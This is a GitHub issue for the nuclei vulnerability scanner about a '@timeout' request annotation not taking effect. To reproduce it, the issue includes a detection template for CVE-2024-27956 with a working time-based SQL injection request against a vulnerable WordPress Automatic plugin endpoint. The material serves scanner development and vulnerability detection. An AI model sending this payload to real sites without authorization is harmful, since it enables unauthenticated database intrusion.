Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

timeout request annotation not working in templates #5137

Closed
tarunKoyalwar opened this issue May 2, 2024 · 0 comments · Fixed by #5148
Closed

timeout request annotation not working in templates #5137

tarunKoyalwar opened this issue May 2, 2024 · 0 comments · Fixed by #5148
Assignees
@tarunKoyalwar
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Milestone
nuclei v3.2.8

Comments

@tarunKoyalwar
Copy link
Member

tarunKoyalwar commented May 2, 2024
edited

Nuclei version:

main | dev

Current Behavior:

Note

This is directly related with max-host-error , so we need to make sure that we ignore timeout based templates from mhe since these are not unresponsive errors but are caused by exploit

Proposed Solution

Steps To Reproduce:

id: CVE-2024-27956

info:
  name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: |
    Update to version 3.92.1 or later.
  reference:
    - https://github.com/truonghuuphuc/CVE-2024-27956
    - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
    - https://github.com/NaInSec/CVE-LIST
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
    cvss-score: 9.9
    cve-id: CVE-2024-27956
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.08203
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "wp-content/plugins/wp-automatic"
  tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/csv")'
        condition: and

Anything else:
@tarunKoyalwar tarunKoyalwar added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label May 2, 2024
@tarunKoyalwar tarunKoyalwar changed the title timeout not working in templates timeout request annotation not working in templates May 2, 2024
@tarunKoyalwar tarunKoyalwar self-assigned this May 2, 2024
@tarunKoyalwar tarunKoyalwar mentioned this issue May 7, 2024
Merged
@ehsandeep ehsandeep added this to the nuclei v3.2.8 milestone May 24, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@tarunKoyalwar tarunKoyalwar

Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Projects
None yet
Milestone
nuclei v3.2.8
Development

Successfully merging a pull request may close this issue.

multiple bug fixes + performance improvements projectdiscovery/nuclei
2 participants
@ehsandeep @tarunKoyalwar